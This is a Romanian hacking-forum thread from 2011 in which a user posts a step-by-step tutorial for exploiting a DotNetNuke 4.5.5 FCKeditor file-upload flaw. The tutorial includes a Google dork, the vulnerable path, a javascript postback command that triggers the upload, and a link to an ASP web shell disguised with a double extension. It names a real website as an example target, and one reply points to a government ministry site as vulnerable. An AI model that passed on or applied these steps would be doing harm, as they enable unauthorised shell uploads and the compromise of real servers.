DanISR Posted January 23, 2011 Report Posted January 23, 2011 ##################### FedererL ################################### ########################Insecurity-Romania ############# --==[DNN Tutorial Hack]Salut ma numesc FedererL sunt de pe comunitatea FedererL ,astazi o sa va arat exploit DNN [ DotnetNke] , Prin uploadarea unui ASP SHELL1 ) Cauta pe Google.com , cu dork portals/0/Acuma sa incepem , exemplu pe http://televisiondomains.com/Portals/0/ are tot2 ) Dupaia intram pe Television Domains > Link Gallery ( DNN 4.5.5 )/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx[bug , prin acesta putem upload shell , sau mesaj .txt]3 ) Dupa ce am intrat pe Television Domains > Link Gallery ( DNN 4.5.5 ) , dam click pe File ( A File On Your Site ) , si dupaia in bara browser tastati codu acesta :javascript:__doPostBack('ctlURL$cmdUpload','')4 ) La file location Dati root , dupaia dati browse shell asp sau mesaj txt , si upload Selecting file5 ) Toate fisierele care le uplodati si ati dat root vin aici http://televisiondomains.com/Portals/0/6 ) Pentru shell .asp , download here :2shared - download federerl.asp;.jpgAcesta A Fost tutorial Cu Stima DanISR , Macar un Thanks pe forum Nu prea e reusit dar merge.. Quote
edededi Posted January 23, 2011 Report Posted January 23, 2011 si just.ro e (ministerul justitiei) Quote
Nytro Posted January 24, 2011 Report Posted January 24, 2011 Da, interesant: "Cum sa folosesti un exploit".Intrebarea mea e simpla: Ce fac daca un site nu are DNN? Sau, de ce m-ar interesa sa "sparg" un site, doar pentru ca are DNN? Quote
